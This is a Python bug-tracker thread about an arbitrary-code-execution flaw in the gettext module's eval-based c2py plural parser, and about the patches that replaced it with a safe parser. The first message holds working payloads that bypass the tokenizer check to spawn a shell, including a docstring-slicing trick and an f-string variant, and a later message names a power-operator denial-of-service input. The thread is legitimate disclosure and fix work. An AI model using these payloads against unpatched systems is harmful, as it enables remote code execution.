msg279734 - (view) |
Author: Carl Ekerot (Carl Ekerot) * |
Date: 2016-10-30 16:58 |
The c2py-function in the gettext module is seriously flawed in many ways due
to its use of eval to create a plural function:
return eval('lambda n: int(%s)' % plural)
My first discovery was that nothing prevents an input plural string that
resembles a function call:
gettext.c2py("n()")(lambda: os.system("sh"))
This is of course a low risk bug, since it requires control of both the plural
function string and the argument.
Gaining arbitrary code execution using only the plural function string requires
that the security checks are bypassed. The security checks utilize the tokenize
module and makes sure that no NAME-tokens that are not "n" exist in the string.
However, it does not check if the parser succeeds without any token.ERRORTOKEN
being present. Hence, the following input will pass the security checks:
gettext.c2py( '"(eval(foo) && ""' )(0)
----> 1 gettext.c2py( '"(eval(foo) && ""' )(0)
gettext.pyc in <lambda>(n)
NameError: global name 'foo' is not defined
It will pass since it recognizes the entire input as a STRING token, and
subsequently fails with an ERRORTOKEN.
Passing a string in the argument to eval will however break the exploit since
the parser will read the start-of-string in the eval argument as end-of-string,
and the eval argument will be read as a NAME-token.
Instead of passing a string to eval, we can build a string from characters in
the docstrings available in the context of the gettext module:
gettext.c2py('"(eval('
'os.__doc__[152:155] + ' # os.
'os.__doc__[46:52] + ' # system
'os.__doc__[318] + ' # (
'os.__doc__[55] + ' # '
'os.__doc__[10] + ' # s
'os.__doc__[42] + ' # h
'os.__doc__[55] + ' # '
'os.__doc__[329]' # )
') && ""')(0)
This will successfully spawn a shell in Python 2.7.11.
Bonus: With the new string interpolation in Python 3.7, exploiting gettext.c2py
becomes trivial:
gettext.c2py('f"{os.system(\'sh\')}"')(0)
The tokenizer will recognize the entire format-string as just a string, thus
bypassing the security checks.
To mitigate these vulnerabilities, eval should be avoided by implementing a
custom parser for the gettext plural function DSL.
|
msg280037 - (view) |
Author: Xiang Zhang (xiang.zhang) * |
Date: 2016-11-04 06:50 |
gettext_c2py.patch tries to avoid the problem. It still uses eval but manually parse the expression using tokens extracted from gettext. Tests are passed.
But there is still a problem. Both patched and original c2py fail to handle nested ternary operator. They respect the right associative but fails to handle expressions like '1?2?3:4:5'.
|
msg280048 - (view) |
Author: Carl Ekerot (Carl Ekerot) * |
Date: 2016-11-04 15:05 |
It doesn't solve the case when an identifier or number is used as a function:
>>> import os
>>> gettext.c2py("n()")(lambda: os.system("sh"))
$
0
>>> gettext.c2py("1()")(0)
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "<string>", line 1, in <lambda>
TypeError: 'int' object is not callable
This is more of an unintended behavior than a security issue.
Xiang Zhang: I've created a patch based on yours which handles the above case. I've also added a corresponding test case.
Imo it would be even better if we could avoid eval. One possible (and safe) way would be to construct a safe subset of Python using the ast module. This would however still require that the C-style syntax is translated to Python. As you mention, there are issues parsing and translating nested ternary operators, and I doubt it will be possible to cover all cases with the regex replace utilized today.
|
msg280082 - (view) |
Author: Serhiy Storchaka (serhiy.storchaka) * |
Date: 2016-11-04 20:47 |
> But there is still a problem. Both patched and original c2py fail to handle nested ternary operator. They respect the right associative but fails to handle expressions like '1?2?3:4:5'.
What if make repeated replacements with regular expression r'([^?:]*?)\?([^?:]*?):([^?:]*)'?
|
msg280084 - (view) |
Author: Serhiy Storchaka (serhiy.storchaka) * |
Date: 2016-11-04 20:58 |
> It doesn't solve the case when an identifier or number is used as a function:
In the first case we should convert an argument to integer.
ns = {}
exec('''if True:
def func(arg):
n = int(arg)
return {}
'''.format(plural), ns)
return ns['func']
Or raise an exception if argument is not integer.
In the second case I think we can just left it as is. This is not valid C expression.
Or we can add try/except in above code and convert TypeError to ValueError if this is more preferable exception.
|
msg280103 - (view) |
Author: Xiang Zhang (xiang.zhang) * |
Date: 2016-11-05 07:37 |
> gettext.c2py("n()")(lambda: os.system("sh"))
> gettext.c2py("1()")(0)
Empty parentheses should be disallowed. Function calls are not allowed in plural expression. And non-integer argument should be disallowed either, just as Serhiy's example shows.
> What if make repeated replacements with regular expression r'([^?:]*?)\?([^?:]*?):([^?:]*)'?
How does it work for '1?2:3?4:5'? :-( I am considering a parser.
|
msg280104 - (view) |
Author: Serhiy Storchaka (serhiy.storchaka) * |
Date: 2016-11-05 08:29 |
> How does it work for '1?2:3?4:5'?
'1?2:3?4:5' -> '(2 if 1 else 3)?4:5' -> '(4 if (2 if 1 else 3) else 5'
But there are other problems. Precedence of some operators is different in C and Python. Chained comparison in Python cause different result that in C (e.g. '2 == 2 == 2'). Seems there is no other way besides a simple parser.
gettext_c2py.patch itself LGTM for fixing security issue, but tests are needed. It would be nice to make c2py() working with any expressions, but if this is too hard, this can be left for other issue. I'm going to commit a variant of gettext_c2py.patch before 3.6 release if there will be not better patches.
|
msg280107 - (view) |
Author: Carl Ekerot (Carl Ekerot) * |
Date: 2016-11-05 09:56 |
Verified gettext.c2py with gettext_c2py.patch applied agains the plural forms actually used in localization, listed over at http://docs.translatehouse.org/projects/localization-guide/en/latest/l10n/pluralforms.html. I tested all of the none-trivial forms, and from what I can tell they generate valid syntax and are correct.
|
msg280112 - (view) |
Author: Xiang Zhang (xiang.zhang) * |
Date: 2016-11-05 13:36 |
> '1?2:3?4:5' -> '(2 if 1 else 3)?4:5' -> '(4 if (2 if 1 else 3) else 5'
This is not right. It's right associative so it should be
1?2:(3?4:5) -> 1?2:(4 if 3 else 5) -> 2 if 1 else (4 if 3 else 5)
> It would be nice to make c2py() working with any expressions, but if this is too hard, this can be left for other issue.
Agree. But I am interested in trying.
> gettext_c2py.patch itself LGTM for fixing security issue, but tests are needed.
It gets drawbacks so I don't include tests. I'll add in next try.
|
msg280118 - (view) |
Author: Christian Heimes (christian.heimes) * |
Date: 2016-11-05 17:49 |
The gettext module might be vulnerable to f-string attacks, too. Also see #18317.
|
msg280119 - (view) |
Author: Carl Ekerot (Carl Ekerot) * |
Date: 2016-11-05 18:00 |
> The gettext module might be vulnerable to f-string attacks
It is. See the example in the first comment:
gettext.c2py('f"{os.system(\'sh\')}"')(0)
This vulnerability seems to be solved in Xiang's patch. The DoS aspect is interesting though, since there's no constraints against malicious use of the power-operator, say "9**9**9**..**9". This too would be solved by implementing a parser with only simple arithmetics.
|
msg280120 - (view) |
Author: Christian Heimes (christian.heimes) * |
Date: 2016-11-05 18:17 |
Argh, sorry. I meant to write "The gettext module might be vulnerable to more than f-string attacks.".
May I suggest that you have a look at my old patch? It uses an AST visitor to inspect the AST of a gettext plural expression. It allows only a limited set of AST types as well as limited amount of expressions. I consider it a superior solution and a fix for more generic attacks.
I haven't tested my patch with f-strings yet. It either refuses f-strings FormattedValue already or can be easily modified to reject it.
|
msg280122 - (view) |
Author: Xiang Zhang (xiang.zhang) * |
Date: 2016-11-05 19:21 |
Christian, I think our patches are quite similar in function. They only allow limited tokens.
> I consider it a superior solution and a fix for more generic attacks
Mine now still allows **. But it can be easily fixed.
But both our patches still translate a C expression to Python and still suffer from nested ternary operator and different semantics between C and Python, e.g. (2==2==2 as Serhiy notes). :-( I plan to try a simple parser.
|
msg280157 - (view) |
Author: Xiang Zhang (xiang.zhang) * |
Date: 2016-11-06 17:37 |
gettext_c2py_v2.patch implements a simple C expression parser. More tests are included.
Carl, hope you are willing to test it.
|
msg280191 - (view) |
Author: Carl Ekerot (Carl Ekerot) * |
Date: 2016-11-07 08:37 |
Judging by the code, this seems to be a much more rigid implementation. I've only run the unit tests and some variations of my initial examples, and everything seems to work as intended. Will look at it more closely this afternoon.
One thing that caught my attention in the patch is that gettext.c2py is removed entirely. I know that this function is not exposed in the docs or in __all__, but it still has "public scope" and it's likely used directly in the wild (googling the signature confirms this). Perhaps it should give a DeprectationWarning and delegate to _Plural?
|
msg280196 - (view) |
Author: Xiang Zhang (xiang.zhang) * |
Date: 2016-11-07 09:13 |
> Perhaps it should give a DeprectationWarning and delegate to _Plural?
I hold a conservative opinion about this. c2py in my mind should be a inner help method. It's not documented so if there are users using it, they are risking changes. And as reported here, it's buggy and dangerous.
|
msg280211 - (view) |
Author: Serhiy Storchaka (serhiy.storchaka) * |
Date: 2016-11-07 17:14 |
Sorry Xiang, but your patch looks overcomplicated to me. Too much methods, decorators, classes, too much strange names.
Here is simpler implementation with using only one recursive function.
|
msg280276 - (view) |
Author: Xiang Zhang (xiang.zhang) * |
Date: 2016-11-08 03:40 |
> Sorry Xiang, but your patch looks overcomplicated to me. Too much methods, decorators, classes, too much strange names.
It's fine. That's a Pratt parser. Yes, the names are strange. Your patch looks more simpler. I left several comments.
|
msg280287 - (view) |
Author: Serhiy Storchaka (serhiy.storchaka) * |
Date: 2016-11-08 08:58 |
Just for reference:
https://www.gnu.org/software/gettext/manual/gettext.html#Plural-forms
http://git.savannah.gnu.org/cgit/gettext.git/tree/gettext-runtime/intl/plural.y
Yet one security issue is that too deep recursion can cause MemoryError or even a crash in Python compiler. My patch creates too much nested parenthesis. Updated patch minimize using parenthesis to minimum and adds guards against too deep recursion.
|
msg280289 - (view) |
Author: Xiang Zhang (xiang.zhang) * |
Date: 2016-11-08 10:01 |
LGTM. And I expect there could be a comment about the special decimal number.
|
msg280293 - (view) |
Author: Serhiy Storchaka (serhiy.storchaka) * |
Date: 2016-11-08 11:18 |
What a comment you need Xiang? Isn't existing comment enough?
|
msg280299 - (view) |
Author: Carl Ekerot (Carl Ekerot) * |
Date: 2016-11-08 12:37 |
Looks good to me. It behaves as intended on every input I can think of.
|
msg280307 - (view) |
Author: Xiang Zhang (xiang.zhang) * |
Date: 2016-11-08 13:13 |
> What a comment you need Xiang? Isn't existing comment enough?
Serhiy, I mean the case a number starting with 0, e.g. 0123. The plural form is a C expression and in C 0123 is an octal number. c2py now interprets it as a decimal number.
|
msg280337 - (view) |
Author: Roundup Robot (python-dev) |
Date: 2016-11-08 19:28 |
New changeset e0cc3fadd7b3 by Serhiy Storchaka in branch '2.7':
Issue #28563: Fixed possible DoS and arbitrary code execution when handle
https://hg.python.org/cpython/rev/e0cc3fadd7b3
New changeset 7e66c5dc4218 by Serhiy Storchaka in branch '3.3':
Issue #28563: Fixed possible DoS and arbitrary code execution when handle
https://hg.python.org/cpython/rev/7e66c5dc4218
New changeset 730cf8cdf02c by Serhiy Storchaka in branch '3.4':
Issue #28563: Fixed possible DoS and arbitrary code execution when handle
https://hg.python.org/cpython/rev/730cf8cdf02c
New changeset e0dd4cc9661a by Serhiy Storchaka in branch '3.5':
Issue #28563: Fixed possible DoS and arbitrary code execution when handle
https://hg.python.org/cpython/rev/e0dd4cc9661a
New changeset 7ea64ab9a5c8 by Serhiy Storchaka in branch '3.6':
Issue #28563: Fixed possible DoS and arbitrary code execution when handle
https://hg.python.org/cpython/rev/7ea64ab9a5c8
New changeset 4ca9a4f96edc by Serhiy Storchaka in branch 'default':
Issue #28563: Fixed possible DoS and arbitrary code execution when handle
https://hg.python.org/cpython/rev/4ca9a4f96edc
|
msg280780 - (view) |
Author: Tim Graham (Tim.Graham) * |
Date: 2016-11-14 15:03 |
Hi, this broke a couple tests with Django because it's passing number as a float rather than an integer. For example:
======================================================================
ERROR: test_localized_formats (template_tests.filter_tests.test_filesizeformat.FunctionTests)
----------------------------------------------------------------------
Traceback (most recent call last):
File "/home/tim/code/django/tests/template_tests/filter_tests/test_filesizeformat.py", line 28, in test_localized_formats
self.assertEqual(filesizeformat(1023), '1023\xa0Bytes')
File "/home/tim/code/django/django/template/defaultfilters.py", line 895, in filesizeformat
value = ungettext("%(size)d byte", "%(size)d bytes", bytes_) % {'size': bytes_}
File "/home/tim/code/django/django/utils/translation/__init__.py", line 91, in ungettext
return _trans.ungettext(singular, plural, number)
File "/home/tim/code/django/django/utils/translation/trans_real.py", line 385, in ngettext
return do_ntranslate(singular, plural, number, 'ngettext')
File "/home/tim/code/django/django/utils/translation/trans_real.py", line 372, in do_ntranslate
return getattr(t, translation_function)(singular, plural, number)
File "/home/tim/code/cpython/Lib/gettext.py", line 441, in ngettext
tmsg = self._catalog[(msgid1, self.plural(n))]
File "<string>", line 4, in func
ValueError: Plural value must be an integer, got 1023.0.
Can you advise if this patch could be adapted or if Django should adapt?
By the way, I used this patch to get a more useful error message:
diff --git a/Lib/gettext.py b/Lib/gettext.py
index 7032efa..2076a3f 100644
--- a/Lib/gettext.py
+++ b/Lib/gettext.py
@@ -185,7 +185,7 @@ def c2py(plural):
exec('''if True:
def func(n):
if not isinstance(n, int):
- raise ValueError('Plural value must be an integer.')
+ raise ValueError('Plural value must be an integer, got %%s.
return int(%s)
''' % result, ns)
return ns['func']
|
msg280781 - (view) |
Author: Xiang Zhang (xiang.zhang) * |
Date: 2016-11-14 15:29 |
GNU gettext only allows the plural value(n) to be an integer(unsigned long int). Django deliberately converts the value to long in filesizeformat. Any reason not to use int?
|
msg280784 - (view) |
Author: Serhiy Storchaka (serhiy.storchaka) * |
Date: 2016-11-14 15:53 |
Proposed patch makes gettext accepting non-integer numbers. But DeprecationWarning is emitted if this number have fractional part (because in this case the result of current code can be different from the result of old code). I think Django tests should be passed without errors and warnings.
In future versions (probably in 3.7) this warning will be replaced with TypeError or ValueError, and new warning will be added for all non-integer numbers.
|
msg280789 - (view) |
Author: Tim Graham (Tim.Graham) * |
Date: 2016-11-14 16:23 |
Thanks, that does fix that first test. There is one more that still fails:
$ python -Wall tests/runtests.py humanize_tests.tests.HumanizeTests.test_i18n_intword
Testing against Django installed in '/home/tim/code/django/django' with up to 3 processes
Creating test database for alias 'default'...
Creating test database for alias 'other'...
/home/tim/code/cpython/Lib/gettext.py:454: DeprecationWarning: Plural value must be an integer, got 1.2
tmsg = self._catalog[(msgid1, self.plural(n))]
/home/tim/code/cpython/Lib/gettext.py:454: DeprecationWarning: Plural value must be an integer, got 1.2
tmsg = self._catalog[(msgid1, self.plural(n))]
F
======================================================================
FAIL: test_i18n_intword (humanize_tests.tests.HumanizeTests)
----------------------------------------------------------------------
Traceback (most recent call last):
File "/home/tim/code/django/tests/humanize_tests/tests.py", line 133, in test_i18n_intword
self.humanize_tester(test_list, result_list, 'intword')
File "/home/tim/code/django/tests/humanize_tests/tests.py", line 39, in humanize_tester
msg="%s test failed, produced '%s', should've produced '%s'" % (method, rendered, result))
AssertionError: '1,2 Million' != '1,2 Millionen' : intword test failed, produced '1,2 Million', should've produced '1,2 Millionen'
I think the relevant code is https://github.com/django/django/blob/cbae4d31847d75d889815bfe7c04af035f45e28d/django/contrib/humanize/templatetags/humanize.py#L60-L63. I'm not too familiar with this code, but I'll try to get a better explanation if it's not clear to you.
|
msg280791 - (view) |
Author: Serhiy Storchaka (serhiy.storchaka) * |
Date: 2016-11-14 16:32 |
What about following patch?
|
msg280792 - (view) |
Author: Tim Graham (Tim.Graham) * |
Date: 2016-11-14 16:49 |
Yes, that fixes the second test. Current warning (with stacklevel=3):
/home/tim/code/cpython/Lib/gettext.py:454: DeprecationWarning: Plural value must be an integer, got 1.29
tmsg = self._catalog[(msgid1, self.plural(n))]
Possibly the stacklevel should instead be 4:
/home/tim/code/django/django/utils/translation/trans_real.py:373: DeprecationWarning: Plural value must be an integer, got 1.29
return getattr(t, translation_function)(singular, plural, number)
|
msg280800 - (view) |
Author: Roundup Robot (python-dev) |
Date: 2016-11-14 17:31 |
New changeset 5b6cde995b3a by Serhiy Storchaka in branch '3.3':
Issue #28563: Make plural form selection more lenient and accepting
https://hg.python.org/cpython/rev/5b6cde995b3a
New changeset 6ca91a14a555 by Serhiy Storchaka in branch '2.7':
Issue #28563: Make plural form selection more lenient and accepting
https://hg.python.org/cpython/rev/6ca91a14a555
New changeset f78a05cda5aa by Serhiy Storchaka in branch '3.4':
Issue #28563: Make plural form selection more lenient and accepting
https://hg.python.org/cpython/rev/f78a05cda5aa
New changeset 6a2754055ff8 by Serhiy Storchaka in branch '3.5':
Issue #28563: Make plural form selection more lenient and accepting
https://hg.python.org/cpython/rev/6a2754055ff8
New changeset 4c201c65ce5d by Serhiy Storchaka in branch '3.6':
Issue #28563: Make plural form selection more lenient and accepting
https://hg.python.org/cpython/rev/4c201c65ce5d
New changeset d0efb8532589 by Serhiy Storchaka in branch 'default':
Issue #28563: Make plural form selection more lenient and accepting
https://hg.python.org/cpython/rev/d0efb8532589
|
msg280802 - (view) |
Author: Serhiy Storchaka (serhiy.storchaka) * |
Date: 2016-11-14 17:39 |
Yes, you are right, the stacklevel should be 4. Thank you for your report and testing Tim.
Committed the patch without any deprecation. Will add a deprecation in separate issue.
|
|
Date |
User |
Action |
Args |
2022-04-11 14:58:38 | admin | set | github: 72749 |
2017-03-31 16:36:31 | dstufft | set | pull_requests:
+ pull_request1039 |
2016-11-14 17:39:32 | serhiy.storchaka | set | status: open -> closed
messages:
+ msg280802 stage: patch review -> resolved |
2016-11-14 17:31:44 | python-dev | set | messages:
+ msg280800 |
2016-11-14 16:49:45 | Tim.Graham | set | messages:
+ msg280792 |
2016-11-14 16:32:05 | serhiy.storchaka | set | files:
+ gettext-non-integer-plural-2.patch
messages:
+ msg280791 |
2016-11-14 16:23:08 | Tim.Graham | set | messages:
+ msg280789 |
2016-11-14 15:53:29 | serhiy.storchaka | set | status: closed -> open files:
+ gettext-non-integer-plural.patch messages:
+ msg280784
stage: resolved -> patch review |
2016-11-14 15:29:07 | xiang.zhang | set | messages:
+ msg280781 |
2016-11-14 15:03:39 | Tim.Graham | set | nosy:
+ Tim.Graham messages:
+ msg280780
|
2016-11-08 19:32:58 | serhiy.storchaka | link | issue18317 superseder |
2016-11-08 19:29:34 | serhiy.storchaka | set | status: open -> closed resolution: fixed stage: patch review -> resolved |
2016-11-08 19:28:55 | python-dev | set | nosy:
+ python-dev messages:
+ msg280337
|
2016-11-08 13:13:36 | xiang.zhang | set | messages:
+ msg280307 |
2016-11-08 12:37:38 | Carl Ekerot | set | messages:
+ msg280299 |
2016-11-08 11:18:34 | serhiy.storchaka | set | messages:
+ msg280293 |
2016-11-08 10:01:30 | xiang.zhang | set | messages:
+ msg280289 |
2016-11-08 08:58:07 | serhiy.storchaka | set | files:
+ gettext-parse-plural-2.patch
messages:
+ msg280287 |
2016-11-08 03:40:06 | xiang.zhang | set | messages:
+ msg280276 |
2016-11-07 17:14:33 | serhiy.storchaka | set | files:
+ gettext-parse-plural.patch
messages:
+ msg280211 |
2016-11-07 09:13:09 | xiang.zhang | set | messages:
+ msg280196 |
2016-11-07 08:37:15 | Carl Ekerot | set | messages:
+ msg280191 |
2016-11-06 21:55:53 | serhiy.storchaka | set | assignee: serhiy.storchaka stage: patch review |
2016-11-06 17:37:47 | xiang.zhang | set | files:
+ gettext_c2py_v2.patch
messages:
+ msg280157 |
2016-11-05 19:21:44 | xiang.zhang | set | messages:
+ msg280122 |
2016-11-05 18:17:49 | christian.heimes | set | messages:
+ msg280120 |
2016-11-05 18:00:31 | Carl Ekerot | set | messages:
+ msg280119 |
2016-11-05 17:49:56 | christian.heimes | set | nosy:
+ christian.heimes messages:
+ msg280118
|
2016-11-05 13:36:53 | xiang.zhang | set | messages:
+ msg280112 |
2016-11-05 09:56:13 | Carl Ekerot | set | messages:
+ msg280107 |
2016-11-05 08:29:03 | serhiy.storchaka | set | priority: high -> deferred blocker
messages:
+ msg280104 |
2016-11-05 07:37:11 | xiang.zhang | set | messages:
+ msg280103 |
2016-11-04 20:58:07 | serhiy.storchaka | set | messages:
+ msg280084 |
2016-11-04 20:47:51 | serhiy.storchaka | set | messages:
+ msg280082 |
2016-11-04 15:05:47 | Carl Ekerot | set | files:
+ gettext_c2py_func.patch
messages:
+ msg280048 |
2016-11-04 06:50:57 | xiang.zhang | set | files:
+ gettext_c2py.patch keywords:
+ patch messages:
+ msg280037
|
2016-10-31 11:23:54 | xiang.zhang | set | nosy:
+ xiang.zhang
|
2016-10-30 18:17:07 | serhiy.storchaka | set | priority: normal -> high nosy:
+ serhiy.storchaka
|
2016-10-30 17:25:30 | SilentGhost | set | nosy:
+ loewis
|
2016-10-30 16:58:41 | Carl Ekerot | create | |